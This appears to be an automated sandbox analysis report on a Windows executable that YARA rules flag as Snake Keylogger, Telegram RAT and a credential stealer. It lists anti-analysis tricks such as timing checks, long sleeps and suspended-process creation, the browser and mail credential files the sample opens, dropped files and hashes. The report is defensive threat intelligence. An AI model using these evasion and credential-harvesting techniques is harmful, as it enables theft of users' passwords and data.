Source: C:\Users\user\Desktop\JOSXXL1.exe	RDTSC instruction interceptor: First address: 9155A4B second address: 9155A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434F42160h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JOSXXL1.exe	RDTSC instruction interceptor: First address: 48C5A4B second address: 48C5A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434B962A0h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Memory allocated: 37450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Memory allocated: 39450000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598913	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598229	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597191	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595824	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595355	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595247	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595117	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593578	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593344	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Window / User API: threadDelayed 1665			Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Window / User API: threadDelayed 8156			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\JOSXXL1.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\JOSXXL1.exe

API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624	Thread sleep count: 1665 > 30	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624	Thread sleep count: 8156 > 30	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598913s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598229s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597191s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595824s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595355s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595117s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593344s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004064C6 FindFirstFileW,FindClose,	4_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598913	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598229	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597191	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595824	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595355	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595247	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595117	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593578	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593344	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxA

Source: C:\Users\user\Desktop\JOSXXL1.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JOSXXL1.exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Enables debug privileges

Source: C:\Users\user\Desktop\JOSXXL1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\JOSXXL1.exe

Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Users\user\Desktop\JOSXXL1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A5

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

ID:	1542950
Product:	CloudBasic
Start time:	23:55:05
Start date:	26.10.2024
Sample:	JOSXXL1.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	fb24966daab46af066a7b7c041236de9
SHA1:	391bb0f3da952bbbf14b61b7f6c01175344be882
SHA256:	8e5d0c237ba87f5b445c7edcf6d5ea6071fb873c64b6431f4f98527461aac37d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	EE260C45E97B62A5E42F17460D406068	DF35F6300A03C4D3D3BD69752574426296B78695	E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
C:\Users\user\AppData\Local\Temp\nsxA532.tmp	data	5FACE8BE4B0588E347D791DB87BCE6E8	2AC3BEF878AF7119B401C1CA8EC83BF6A4EF9402	8D06F457E594F4B32611FBB2E5550E7442504E2AA407B627AF49F203EBA5E843
C:\Users\user\AppData\Local\indvandrings\attraavrdig\Afsvor193\stiltish.sti	data	FD876F66CB55E8597AB2ADCB1715E24D	90DE8C19016E7121C2861CF748262A44F57C2DE0	404E86068579D935C692F89EBB98EBA6D930A536B4833468C536F1A0273FDDE2
C:\Users\user\AppData\Local\indvandrings\attraavrdig\Udeladelsens.txt	ASCII text, with CRLF line terminators	4EF1859A18FB4C5B61DB725AAFE27F90	D31A038EA086536F22BF7D64FF099AD5D8800706	D21E0CD7A7C2E95FFCAFCD23F04D2A232729F672FBB47B7D0776ABB3229FBB0B
C:\Users\user\AppData\Local\indvandrings\attraavrdig\Vandlbslov.Uni	data	4676EBA5220757447D27571E8299B3AE	B3895C58A55C480C330A642175923025D47EE198	88D22420602D6EC710ED98BE4651416382BD598FEC5C0A1B29FE9606189D93E7
C:\Users\user\AppData\Local\indvandrings\attraavrdig\nontelegraphical.hyp	GTA audio index data (SDT)	21BDD59977EA7CD06C63391AA9FD189E	9CC5B83758407C6D78BD2A96E6A31533C640C524	B301C24D700076375EAA2394A9E0B754DDAA6A6A7066E8B7AE6FFAEA259B03D4
C:\Users\user\AppData\Local\indvandrings\attraavrdig\sluggardly.udf	data	DEEA5D4F6617FE0772227FD43368936F	AE52FCB091DCE0118E79E4FF46F0A04BB25C350A	268FCAE0EC44A3E572DFC0BF3C55306200687AA96ED484E50FAE4F1FDC400E04

Windows Analysis Report
JOSXXL1.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report JOSXXL1.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

